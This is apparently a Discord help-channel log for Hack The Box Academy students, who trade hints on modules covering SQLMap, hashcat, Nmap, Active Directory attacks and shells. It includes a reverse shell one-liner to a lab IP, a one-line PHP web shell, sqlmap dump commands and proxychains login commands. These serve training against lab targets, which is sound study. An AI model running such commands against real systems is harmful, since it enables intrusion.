#modules

it was a problem with a combination of not the right exploit, wrong payload, wrong ip 😛

and me flipping between them trying to troubleshoot and not finding the right combination

AH

yeah

lol

you wanna talk about a sanity check

6 HOURS LATER

i was working on JUST that host

for that long

if you need help with either of the other hosts if you don't have them already :)

i got them all now

i did them in sequence

hi what module is this related to?

i don't remember there being any modules related to instagram

at least in the penetration tester path

igshid is instagram share id if you're wondering

click/link tracker

googled it :)

oooh

you mean grabify link?

also i don't think this is that because the link is instagram domain

EITHER WAY

off-topic

This link does not belong here :)

yeah he's just trying to flex his small pp setup

Hey guys working through SQLMAP module and having a hard time understanding how to use this well so far. I've gotten it to spit out and show 5 vulnerabilities for questions #1 Whats the contents of table falg2? (Case #2)

I see the option to dump all tables and certain table names but having a hard time how to add that to the request. I've initially run
Copy command as curl and switched to sqlmap as it show.

he is rank 70 on thm 🤣 https://tryhackme.com/p/devilkabristan why tf you do have to spam bro??

"Bug cannot be Mistake, It's a big matter to Found Victim."

both cringe and dumb

Man had a stroke while he was writing lmao

i had a stroke reading that

can you tell

Lool

you need to find the database and the table from the database to dump

Lmao

So since we already have database name I should just be able to name the database and go from there?

if you need help with the tag there is a detail about each tag in the help menu but for this hint if you are having issue dumping the flag then save the request into a file and run sqlmap with that file (-r tag), you may don't need to do this but this is what i have in my note for case 2

Yea let me keep reading just trying to wrap my head around it a bit. Feels slight overwhelming /confusing at first

hint the table

enumerate the database and find the table you're looking for then try dumping the contents

jesus christ even if he cheat 1600+ task in 1 day?? oh way he must use a bot or something

Let me work with that info and see what I can get, need to keep rereading through as well.

Probably best to just leave it alone and let mods handle it at their discretion :) keep this channel on topic

yeah i may ask thm mod about this

@novel matrix

i think you are right on the 12 yo 🤣 half of his face reflect on one of the instagram image

yo if anyone wants some tools hit me up in dm's

big poppa Jabba is on your ass

Could I please get a hint for the password attacks medium lab? I am on the box as the user j.… I see what’s running on the box but unable to login with already found creds on the found services running

hint check ||the key||

Checked … key for user j..non existent in his home directory. No access to user d for … key

oh wait sorry wrong user

this should be the right path

shoot me a dm on what issue you are having

Will do thanks!

I'm stuck at Active Subdomain Enumeration and finding the TXT record ! I've tried "dig txt {subdomain}:{sub IP} and get nothing back if I try zone transfer with this domains and IP's i just get transfer failed... what am I doing wrong ? any hints are greatly appreciated !

pls say what module you are in next time but hint you have to use dig txt (subdomain) @(target machine ip) because all subdomain ip are dead so you can only use the given target machine and also a zone transfer (on the right subdomain) will give you the flag for this question and some more subdomain

also because all subdomain ip is dead it's not recommended to use tool for live host like nslookup

Hi Guys hope your well. I am stuck on Common Web Vulnerabilities. So the question is -

To which of the above categories does public vulnerability 'CVE-2014-6271' belongs to?

I check the hint and it says the following
It's on of the above! Simply search for the vulnerability description and read about it, and you'll know the answer.

So I read the description but does not give any indication of the category.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

I have tried
-GNU Bash
-Bash Linux
-OpenSSH
-sshd
-mod_cgi
-mod_cgid
-Apache HTTP Server

No luck if anyone can help that would be great?

Many Thanks

Hey, is there a command to download the openvpn key on a personal VM without going to the relative webpage? The web instance doesn't seem to want to start and might as well practice using commands more as I'm rather new. Thanks in advance!

for that nope

you should be able to download the VPN file on your host OS and put it in a shared folder

which module and section are you in?

there's no other way than to download it from HTB academy but if you don't want to download it on the VM you can do the shared folder method

Common Web Vulnerabilities is the module and the program is INTRODUCTION TO WEB APPLICATIONS

Alright thanks!

yeah the description of this cve i don't think will give you the "exploit categories" you have to chose one of the 4 that was given in the section based on the description

If you download it, if you look at the downloads there is a remote file download location: should be able to wget and copy that, though most VM have a way to just copy over files easily

I tried these and did not work I have tried
-GNU Bash
-Bash Linux
-OpenSSH
-sshd
-mod_cgi
-mod_cgid
-Apache HTTP Server

none of that is given in the section

Have i got the correct description

nope

Ok so the hint says It's on of the above! Simply search for the vulnerability description and read about it, and you'll know the answer. Is it in that section

yep "one of the above" mean one the the categories showed in the section

ok let me look into this and come back to you

https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271

i just check that one how tf did i miss it 🤣

Would it be in here

As i was there that is where i got the description from but @vital adder is saying its on the page.

because this module spoiler give me a sec i'll dm you

@vital adder is absolutely right. The solution is on the page

Thanks guys i got it.

Do you guys work in cyber secuirty

as a job?

#modules message

also pls remove this

Sorry all done now

Hey all, I am working on the hashcat academy module. I am stuck on the "working with rules" section. I have tried running this command and a couple others like it "sudo hashcat -a 0 -m 100 <HASH FILE> <ROCKYOU WORDLIST> -r <RULE FILE>"
In the rule file I have it set as "$2$0$2$0". It keeps on telling me that it is exhausted. Can someone help point me in the right direction?

$1-4 are user defined wildcards

is academy down?

cannot connect to the box/ have reset HTBA/ Have reset the box

If I add --stdout on the end of the hashcat command it prints the contents of the rockyou.txt wordlist with 2020 appended to the end of each entry so I dont think that it is the rule

stop your proxy

You need to add your rule, not replace it

Its burps built in browser / intercept is off

stop it then

ive also tried on other ones its not on

if you see this, it means that somewhere the request is being intercepted

Yea i've killed everything

Okay ill just reset the vm

and try

I thought that I had added it with the -r after listing the wordlist.

I mean the rule itself. Take the rule from the module and add your rule.

|| $echo 'so0 si1 se3 ss5 sa@ c $2 $0 $2 $0' > rule.txt ||

Pivoting/Portforwarding/Tunneling is one I think I need to take one chunk at a time it make my tiny brain hurt

are you running that sqlmap command or are you running it against a spawned target?

its running against a spawned target

sqlmap -u "http://ip/?id=1" --banner --current-user --current-db --is-dba

For some reason i can't ping target, even from within pwnbox

ls

ls

then it is offline or sth. Maybe the time is up

nah, restarted it milion times, downloaded also vpns files numerous times to try it from my os, same result

Hello guys

Am in urgent need

Pls answer

@everyone

trouble with an htb academy module?

No lol

then go somewhere else :)

Does anybody have a link or know how to hack professionaly

^

see Rule 4 - #rules

Oh my bad

But u guys offer hacking lessons

And tips

are you requesting a service?

Yes

in what way?

Hacking

Ik how to dox

But takes too much time

sorry, nobody here will take you up on your request.

But u guys give hacking tips

sure, but we deal with ethical hacking

now i would suggest taking business elsewhere so the channel doesn't get clogged

Aight

Sorry for bothering

hello house

@quiet musk first: ask to DM; second ask here first prior to jumping straight to DMs :) http://dontasktoask.com ; http://nohello.net/en

Hello, I am the module CROSS-SITE SCRIPTING (XSS) and i am stuck at xss discovery, I try different answer on both question don't if i can have help. Thank You

okay i'm tryin to locate the bash! in HTB ACADEMY can someone help me!

Ok, Ive checked different module 'File Inclusion' and it works, problem only with 'Intorduction to windows command line'

sorry i still don't understand please

Is the IP you're trying to reach a public IP or does it start with 10.?

starts with 10

doesn't work only for one module the windows one, works fine with file inclusion module, both from pwnbox or my system thru vpn

i can check other modules if needed

File Inclusion doesn't use Private IPs (10.). Its using public ones

oh ok

So my guess is that something is wrong with your VPN. Make sure you're connected. You should be able to see a tun0 interface if you run ip addr in terminal

nope its using privet one

10.129.29.112 spawned

Or run ip route and you may see your the IP you want to get to in the routes

doesn't work also from pwnbox so nothing to do with vpn connection i think

linux fundamentals module also responding very nice

Ah I see. There are a couple sections that use Private IPs. I've had to download a different VPN config before (us-academy-1 / us-academy-2) and refresh the target before

ive tried all 4 free ones already, even switched between tcp and udp

Last week, I had to switch from us-academy-1 to us-academy-2. Not sure why. us-academy-1 is working now though

no worries, ill try few more things and just leave it for few days, anyway thanks for help!

pitty i was enjoying this windows stuff, realised how little i know

Sorry I'm not more help. I don't have that module unlocked or else I'd fire it up to check

No worries! Thanks for help!

Good evening, I just cant find the path to the second flag in the SQLMAP MODULE ESSENTIALS question: "Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host."
Ive tried using the script:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Verified the upload with:
curl http://165.22.123.238:30635/shell.php?cmd=ls+-la
changed cmd=ls+-la in the above url to to cmd= dir /
and tried navigating through the directories to locate the other flag.
The question hint says "The flag is in a very common directory"

Can someone help specify the directory of the second flag, nudge me in the right direction, or dm me?

Can someone help me with the Archetype box?

no

for the footprinting medium module, is 'nobody' suppoused to be the owner of the mounted directory?

cannot seem to access it after switching to the user, the UID is the same in passwd

it seems like the user is "squashed" :) maybe look into that or maybe switch to root and see if you can explore that share

Im trying to cURL , but it appears that my machine is broken. It won't display the results. My input is either curl 134.122.103.40 -v or curl 134.122.103.40:31440 -v, but it justs stuck saying trying 134.122.103.40:80. Any advice?

I have a question about a beginner module I'm stuck on. Is this an appropriate place to ask?

Nevermind actually, it just worked after 30 minutes of trying face palm

i was able to get access to it, got sa user but SQL login doesnt seem to work

What module & what's your question?

What type of account can be found on most ( if not all ) windows systems?

http://dontasktoask.com/

It's dumb. Fawn. My issue is, I'm connected via VPN, it wants me to be before I can spawn machine-- easy. But it thinks the Fawn machine is already active so I can't spawn it. Is there a way to close all of my active machines?

Fawn is a box in the starting point machines list; you can verify your account in #bot-commands by typing in ++verify and ask your question in #starting-point or using the search feature in the top right of discord search if your question has been answered. YOu can also try and get in touch with support by expanding that lefthand menu and clicking on "Contact Support"

Administrator... ?

elaborate from that and you'll be able to get what you need

:)

also google "what does 'sa' stand for in windows account name" :)

or specifically what does sa stand for in sql

server auth?

or

system administrator

yep

but the last few things i mentioned are just more for further exploration; you have all the info to get what you need

the certificate chain was issued by an authority that is not trusted

😭

i mean

after connection was established with server

that's fairly standard when remoting in on htb machines

login failed

😭

are you using 'Administrator'?

yes

are you trying to rdp in with admin?

did it now, im in server manager

Gl then you should have it from here

Should be able to access the sql manager with him

And creds

yup just got in that

sweet tyvm

Np

Happy hunting: mssql is a pain fyi

got it @fathom pendant tyvm

#starting-point doesn't seem to exist

I'll just wait til support comes back tomorrow

Read #welcome , I think you need to verify first

i did

hi everyone

#starting-point

I'm having trouble in the web requests module CRUD API. These are the inputs i used curl http://161.35.37.149:31486/api.php/city/London -X PUT -d '{"city_name":"flag"}' -H 'Content-Type: application/json'
curl http://161.35.37.149:31486/api.php/city/Birmingham -X DELETE -H 'Content-Type: application/json'
curl http://161.35.37.149:31486/api.php/city/flag
but the result from my last input is just empty brackets. What am I doing wrong?

This is the question: First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

Has anyone completed noSQL injection Skills Assessment II? I tried everything in the module and failed. Can someone give me some advice

I'm having an issue getting the second question answered in the Automating Payloads & Delivery with Metasploit in the Shells and Payloads module. I can't seem to find the right method for authenticating into the target machine.

Help! Having issue with -exec ls -al in my string, says missing argument to ‘-exec’

Thank you for you help, I was able to find the answer!

Having some more sqlmap troubles (questionj #2).
We know that the cookie is intentionally vulnerable and I dont understand why everything I run says its not vulnerable.

I'm using sqlmap -r file.text --data="Cookie: id=1"
Also trying --cookie as well and everything shows as not vulnerable

Thought sqlmap would be a breeze but this is kicking my ass

yep you need to figure out what works. If you ve got a cookie, you definitely need to put that

Did figure it out with some help Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to 2 or above. Read below for details.

it's weird, It is mentioned in later sections. But sometimes checking later sections helps

My brain was hurting....I reread a bunch and just did not understand why I was not able to do it

felt the same

in my first times

Big ass highlight in the notes lol

I was also being dumb and putting in --data when its not a post request

< but we got through it eventually

it just takes a bit of time

Can someone break down this reverse shell command in english?

sh -i >& /dev/tcp/10.10.14.107/1337 0>&1

Just trying to understand how this establishes the reverse shell from the target

I get the call out to the IP / port. But having trouble with the & redirect

@dusky bear use explainshell

https://explainshell.com/

there is also a module explaining that

Thanks

shells and payloads I guess

exlpainshell and chatgpt does a great job explaining alot of stuff in plain english.

let me ask it chatgpt

Yea. ChatGPT is goated for explaining pretty much any piece of code or command you'll ever need explained

Hi, anyone can lend a hand for "Skill Assessment - Broken authentication"?

and it is amazing. Explains so clearly

where are you stuck? Feel free to DM

I try to download pwndoc but I get this error -```] {
opensslErrorStack: [ 'error:03000086:digital envelope routines::initialization error' ],
library: 'digital envelope routines',
reason: 'unsupported',
code: 'ERR_OSSL_EVP_UNSUPPORTED'
}

Node.js v18.14.0
The command '/bin/sh -c npm run build' returned a non-zero code: 1
ERROR: Service 'pwndoc-frontend' failed to build : Build failed

How do I resolve this error?

and also this --> Error: error:0308010C:digital envelope routines::unsupported

When I run this command --> sudo docker-compose up -d --build

Hi everyone ! if someone can help on the module « Password attacks » I’m stuck with the Will and Kira credentials. I tried few things but nothing seems to happen

Refrain from posting flags in your post :)

try lowercase

also are you using the provided password, and custom.rule to create?

note the users do come up quite a bit so saving their password somewhere isn't a bad idea

hello

Hello! can someone please help me on the module "Information Gatherin - web edition" in the section "Web skill assessment" in the last question! Please! 🙂

@hallow swift what is the last question

Perform subdomain enumeration against the target githubapp.com. Which subdomain has the word 'triage' in the name?

@hallow swift use this https://subdomainfinder.c99.nl/

module - setting up
section - organization
issue related to PS1 variable
question - where do I put PS1 variable in .bashrc file to display the date and time.

I used ffuf with the rockyou wordlist, but it didn't work

@hallow swift use https://subdomainfinder.c99.nl/ u will find subdomain

damn that was so easy, I was breaking my brain

Any help with the DNS quiz at Attacking Common Services? I have already discovered some subdomains using subbrute (cl and h*k with their IPs), however I can not proceed from there. Zone transfers are not allowed.

@alpine dome how

I have used dig as a first step, discovered ns.inlanefreight.htb and moved on with subbrute.

Ok, you are trying to look for zone transfer or

I can not do any zone transfers. It fails.

I have restarted the box multiple times.

That means zone transfer is not allowed

The other step is bruteforcing, which has revealed two subdomains with unreachable IPs

try putting main domain to resolver list other than the ns

hmm unreachable ips

@alpine dome put the ip address in resolver and try to brute force the subdomain

I think I have tried that as well. I will try it again.

what do you mean by unreachable ips?

@alpine dome like this python3 subbrute.py inlanefreight.htb -s /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt -r ./resolvers.txt

Yep, tried various wordlists as well.

Let me give it another shot.

Honestly, Academy is a huge waste of time sometimes.

@alpine dome it would be easy if u first delete all ip address that are in resolver.txt before u add in your ip address

The whole "try harder" mentality in this field has gone beyond toxic.

hahaha

my dig didnt work with that section also there are other people had the same problem

In the previous module, I had to waste 30 mins in each task to crack a password.

I ssh to server and get the info that way

I mean you can do it in one task, but spending 2 days in such a huge module waiting for passwords to crack? Is this supposed to be educational?

I have thought of that, however I want to complete it the intended way. If it will allow me.

Some times try harder kills me

It's more like "f*ck you harder" the way it is. Making things hard for the sake of being hard or keeping your reputation is simply awful.

The thing is that I want to take the exam but I can not do so before I complete the path. I have to spend hours trying to figure out what was the creator thinking.

@alpine dome me too i want to take exam

hii

i am new hear

for the hard lab in footprinting, how do i know that there is a mysql server running on the machine when i connect as ||tom||

i read somewhere that mysql is running, but what command can i run to view this?

use netstat -ano

and find the port 3306 running locally

privesc technique

thanks

its a bit of real-life kind of deal. some tools not going to work and you need to find alternatives and such. Which is what happened. People couldnt use sqsh in pwnbox. After the sqsh update something was broken, I guess.

Yes, the thing is that I do not need to bust my head over stupid questions having to guess what the creator was thinking just to take the exam. Let me buy my voucher and let me fail. After all, this whole frustration with the ambiguous and vague tasks have nothing to do with proper learning. It is just another trick to keep users subscribed and raise a reputation of being harder than OffSec

In all due respect, I love HTB and I have learned and keep learning tons of it. But the academy modules are simply hard and vague just for the sake of it.

For the problem, you are having right now. I totally understand. It is not because it is difficult or anything. Its all because stupid dig is not working properly

Maybe it is not supposed to do so. Maybe they want us to go and find the config file. But HINTS US!

Another completely disturbing thing I noticed. Many times, the hints are not just hints, they are part of the solution. Without them, you can go nowhere. When you classify something as a "hint" it should be considered something extra, not an integral part of the solution.

I agree about the hint thing, caused me some headaches

about to do the windows priv esc skills assessments, i can tell it will hurt my brain already 😛

agree about the occasional hint being mandatory is annoying, and sometimes working your way through different wordlists is annoying, but overall it is great content. just get on with it

everyone is helpful in here, you'll never get stuck for too long

hello again, I am still stuck at SQLMap Essentials: Skills Assessment

I have looked at the forum.hackthebox for this Skills Assessment, and I have done everything from simple stuff to hard-complex stuff, but have a look at commad and you you cam find my mistake(s)

sqlmap -r req.txt --technique=S -D testdb -T final_flag --dump --tamper=[tried all of them] --skip-waf --no-cast --level=[tried from 0-5] --batch

and tried scanning for tables, and nothing really was usefull

well, not sure. But, I havent used this many flags at the same time

well i tried many things, that's just a sample, all from simple stuff to many flags stuff

why are you looking into testdb?

i don't know the of the intended table, i have looking the table names, but i didn't get anything

You don't need so many flags and play with -v. That'll give you something to work with

first get the database names. step by step

ok, i will start from there

or if you dont mind waiting, as it is time-based. You can dump it all

actually I am going some where right now, so that seems a great idea. thx alot

you are welcome

@sleek urchin check in your dm

For those doing the AD Enum & Attacks assessments an advice - refer to ligolo if you think that you need to port forward something, it will make the steps quite a bit easier

In the dns footprinting the hint says "Remember that different wordless do not always have the same entries", the last part "same entries" what is supposed to mean in this context? (I'm trying to brute force a domain using dnsenum)

Guys is it the place where you post your questions about the modules you practices with if you stuck somewhere? I just enrolled with silver annual, and it says there will be lab guidence via discord, should I expect someone from HTB Academy officials or this channel is what I am looking for?

As far I know this channel is to ask questions, and maybe someone will help you

thx bro

It means different lists have different words

https://www.hackthebox.com/newsroom/discord-lab-tutoring @marble geode

thx a bunch!

Imo one-on-one is kinda a meh selling point

have you ever used that

Well I say it's meh when this channel exists

Like yeah you're not gonna get 1-1 unless someone DMs you about it. But a LOT of the common questions/issues have been asked and answered here if you know how to utilize discord search feature

sure. But still got curious about it. haha

The biggest selling point for me with silver annual would be : exam voucher, t0-2 modules full access

hmm, that kinda popup first time after i enrolled silver, guess I just need those cudes to unlock module and voucher I gotta use for exams later, still good to have 1 on 1 tutorial, wouldnt hurt to have those accelerators

right

anyone that can give me some help on Footprinting Lab - Hard, I got the key from imaps. Like most others, I get the "Load key "id_rsa": error in libcrypto, Permission denied (publickey)" error. I have used chmod 600 on the key. Command I use: "ssh -i private_key ***@10.129.1.1" in the same folder as the key.

The 1-1 only comes up if you answer incorrectly 3 times

Edit it to make sure there's no weird extra line at the end, copy and paste it in a different editor and try that.

Sometimes it not working is a weird quirk of text editors

hmm, I tried nano and leafpad. Any editor you can recommend, except vim?

Lol I'd say copy paste again and double check you have it copied fully

Including the ---START and ---END , lines

Just wanna say that chatGPT it's a great source and to understand things

chatGPT can also be confidently incorrect

bummer Lol

Like you can ask it about specific command syntax meaning but further than that is where it can fall apart

what did you ask?

Also afaik chatGPT is barred for the exam

👀 hey tux

its a bit weird how would they know if you used it or not

you can connect with a different network with a different pc. Even if someone hacked your whole network which I dont think so

Part of the exam is writing a report :)

you meant it is prohibited, right?

Yes barred/prohibited

still not working

Hmm

Hey I was wondering, what are those mini modules in the academy? I know there are none available at the moment hahah, but can anyone give some insights as to how they gonna work or what content will they have?

Try updating/upgrading your VM os

As there are none available, kinda hard for us to speculate but maybe @west canopy knows, he knows everything

Yeah lol, I was honestly wondering cause I think it's already there a couple weeks but there's nothing in there 😅

I'll wait for his answer, thanks ☺️

stuck at active directory skill assessment part 1
got s*_s* creds and bloodhound but couldn't connect to sql through proxychains. not sure how to get to ms01 from WEB-WIN01
tried evil-winrm and nmap host discovery through proxychains but no luck
anyone can give a nudge

Hey Guys,
I'm trying to play with the new module : Abusing HTTP Misconfigurations
I'm having trouble with the Advanced Cache Poisoning Techniques.
I've setup the vhosts fatget.wcp.htb and cloack.wcp.htb but I can't make the payload work in any of them.
I believe there is something wrong in the server as I should have the Python web framework Bottle for cloack.wcp.htb and wappalyzer is returning PHP.
Can anyone from staff confirm/help ?

When i use the custom.rule its creat a list of “LoveYou1” uppercase I didn’t sow a lower case like the custom.rule that used on diff section

Hello ! Someone could help on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

It is possible to change the photo of the profile in the htb academy?

possible - yes; tricky - also yes

Is in academy.hackthebox.com/settings ?

not quite

bring up the inspector tool and you will find more about the avatars

oh no

we meet again gravatar

Yes the image is from gravatar.com

Password Attacks - Pass the Ticket: I am stuck on the last question but believe I am close to figuring it out. However, I am wondering if I have to find a way to get root level access in order to complete this question or if there is another way to read the file I need to read. Any hints or help?

hack the box is asking submit root flag what to write in the answer box i didnt found answer

@latent umbra You have to find the flag.txt on the machine you are working on

In the ACL enumeration portion of the Active Directory enumeration module for Pentester path, what is the answer to the last question of rights forend has over GPO Management group, given that the search apparently takes 30 minutes and bloodhound isn't giving the answer.

Thank you for your help.

Also, does anyone have a conprehensive list of ACEtypes? why doesnt microsoft provide one?

hi anyone here

Thank you, with the initials frlm the forum I got it

What a waste of time

Hi there is a question on the NMAP module "Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result. ". I tried all the Operating system namesYour and no one shows in right. You help will be highly appreciated.

Which one have you tried ?

Parrot
ParrotOS
Parrot Security

Linux

Debian

Password Attacks - Pass the Ticket: Solved this issues, found the way to answer the LINUX01 question at the end. Hint: || You need root access to get to the files you need which are on the LINUX01 system. ||

guys im sorry, i just wanna know i submitted my first user flag, and I'm happy with that I wanna share it but the share result is not clickable , why 😦

@light cedar Not sure but congrats! What machine?

Stocker

Ayeee

Wait is that a htb machine or what? Was trying to look at it

yea htb machine

https://app.hackthebox.com/machines/523

it's disapointing that i can' t share my result with my people

Guy,s can anybody help me answer my question?

Have you try to find OS with Nmap ? Somerthing like -sV

Someone could help on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

@gray blade can see any os name. Am I not doing the things right ?
sudo nmap 10.129.2.28 -sV

@light cedar @iron basin this channel is for questions regarding modules on hackthebox academy; you can verify your account in #bot-commands

That's not gonna be an OS scan, try -O

-sV is a version scan, -O is OS, -A is aggressive/multiple scans bundled in one

Thanks. Trying with those options. It seems my target machine is down

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

Use -Pn

Thanks.

Be careful with spaces

Not sure is there way to put screenshot on the discord chat. I get

Too many fingerprints match this host to give specific OS details

Am I doing it right ?

sudo nmap 10.129.2.28 -O -sV -Pn

Try everything that the room teaches, -sn, --disable-arp-ping,-A etc...

Thanks

Can i have help on rdp socks tunneling with socks rdp please ? ^^

Did you get it ?

Im stuck, i have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

With jason user

@zenith gazelle I could not make it work yet. Does not show OS info.

In what section are you exactly?

At the end of "Host Discovery"

rdp socks tunneling with socks / forwarding

Try just scanning one port that you've discovered with -p{port}

But also if you take a look at the version of one of the services you can make an educated guess

Thanks @fathom pendant

In what section are you exactly?

Me?

question on resources for visualizing SQL queries? I'm working on SQLmap - Attack Tuning #2 and I'm not understanding the process / steps I should look and and take to figure out what these non-standard boundries are

Host Discovery section

Nah bro, sorry about that, I don't know how to help you

Can anybody see what the OS here?

Yes but you should find thé os name

Thanks @gray blade . I am trying with this -

sudo nmap 10.129.2.49 -O -sV -Pn --disable-arp-pin

Try all commands and you Will find 😉

have you tried including safe scripts, perhaps it can help you determine the thing you need

Hi @autumn pilot could you help how can Ithe i do with safe script ?

also I can see the answer in the output that you have provided

Yeah man you are welcome 😅

Could you point me I put everything I see there, but nothing work. For example Ubuntu.

Read the question in the exercise again, you will notice your mistake

It says "Based on the last result, find out which operating system it belongs to"

I gave -
Ubuntu
Linux
Parrot
ParrotOS

Nothing right.

sounds like youre guessing

look at the "Scan Network Range" snippet and focus on the ICMP packets

What lead you to believe it to be one of those?

Someone could help me on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155

As nothing says right I started guessing which is not right though

@bleak apex why everything you mentioned is linux and icmp packets are same

I am very new basically

https://ostechnix.com/identify-operating-system-ttl-ping/

I know youre new, I was wanting you to examine your thought process that lead you to your answers. If youre just guessing though thats never going to be helpful. Even if you guessed right you wont know why youre right and will have cleared the section without learning.

I agree.

Thanks, the list real helpful but I am puzzled here 😦

Write out whats puzzling you

use that and use what I have given you

Thanks @autumn pilot

As per the report the OS is Linux ? But it does not say it right.

Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 19:52 GMT
Nmap scan report for 10.129.2.49
Host is up (0.077s latency).
Not shown: 993 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
31337/tcp open  Elite?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/14%OT=22%CT=1%CU=40397%PV=Y%DS=2%DC=I%G=Y%TM=63EBE74
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST1
OS:1NW7%O6=M539ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

okay, let's go back a few steps

on which module and section you are currently working

Module: Network Enumeration with Nmap
Section: Host Discovery

That section doesnt have a lab, what are you scanning

it just has a question

Host discovery doesn't have a target, from where have you obtain that output

@autumn pilot Thanks I got it. You are completely right with that chart. Many thanks !!!

np young padawan

anyone did the active directory skill assessment 1. i need a nudge. found creds but couldnt connect to ms01

• AD Enumeration & Attacks - Skills Assessment Part I
• Submit the contents of the flag.txt file on the Administrator desktop on MS01
  proxychains evil-winrm -i <internal-ip> -u <username> -p <password>
proxychains xfreerdp /u:<username> /p:<password> /v:<internal-ip>

is that from Enum & attacks?

yes AD enum & attacks

^ this might be helpful and make your life easier

thanks ill try ligolo. i been doing it with chisel

for MS01 I think I used the hash rather than the password skill assessment 2

Ive heard good things about ligolo but I cleared both sections fairly well with chisel

when i try this command powershell hangs. $password = ConvertTo-SecureString "password" -AsPlainText -Force $cred = new-object System.Management.Automation.PSCredential ("domain\target-username", $password) Enter-PSSession -ComputerName hostname -Credential $cred
also
.\mimikatz.exe

can anyone be of assistance with the documentation & reporting skills assessment? I have a bunch of user names and passwords at this point but don't really know what to do with them. Feel free to DM me 🙂

also what is the answer to: " Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)" Is it not [B] + [Shift] + [%] ?

check out the SQL Injection Fundamentals module

Super confused about some PHP presented in the 'File Upload Attacks' module. I completed it yesterday; now I'm going over the process from a blue team perspective. I don't want to post the code here as to avoid spoilers. Can someone pm me plz?

@static roost DM me, I just finished the module the other day. Maybe I can help

Does anyone know what to do for Network Enumeration hard 🤔? Been stuck on this for days now

Please DM me if you have any tips

Htb should make a module about social engineering

How to defence yourself from it

And reconize it

It worked ligolo and chisel. Forgot to arp and check subnet😅

👍

Can I have help with the final question of Password Attacks Pass the Ticket (PtT) from Linux?

I'm in root, and I ran linikatz, but i have been having trouble sinc there

Mostly common sense

Look into Linux kerberos directories :)

Specifically the daemon that connects it

|| so /tmp ? ||

|| cuz I keep getting NT_Status denied when i try to use smbclient with files from /tmp ||

linux kerberos tickets are just files

There has to be a permanent place to store the file for Linux to connect to the dc

Etc.

I think

Either way there's a client that runs kerberos, that may help you

Got it

Thanks for the help!

I didn't look at the instructions in the module close enough

could I also have a sanity check for attacking common services 'Attacking SQL Databases'?

i know this section was haivng issues in the past

I had no luck with sqsh. had to use mssqlclient

and i tried that too lol if you look at the picture

And i am very confident i entered the right password. Tried this multiple times

:wq!

so if anyone wants to double check that would be sweet. I am going crazy

are you sure thats the right user

damn

LOL

You did the same thing I did huh forgot the b

If I cancel my HTB academy subscription for a while to focus on my academic studies, would my progress be lost?

Any modules you completed stay completed

Alrighty, thanks!

Can someone help me in crackmapexec skills assessment first question, I think I'm doing something really stupid

Shells and Payloads _Live Engagement-Host 3: can someone throw me a hint.. I have || tried using a SMB exploit, no luck--locked out now..can do the webshell, but cant access the flag ||

also one more question. How do i log into the database with mssqlsvc? I tried using xfreerdp and mssqlclient.py

like I've been stuck on this one section for such a long time 🤣

module:SHELLS & PAYLOADS
Sec: laudanum, One webshell to rule them all.

2nd question being "Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)"

I have the shell on server so thats all good. but when im trying to move directory's nothing is working. im just stuck in c:\windows\system32\inetsrv

any hints?

what are you looking for in the directory?

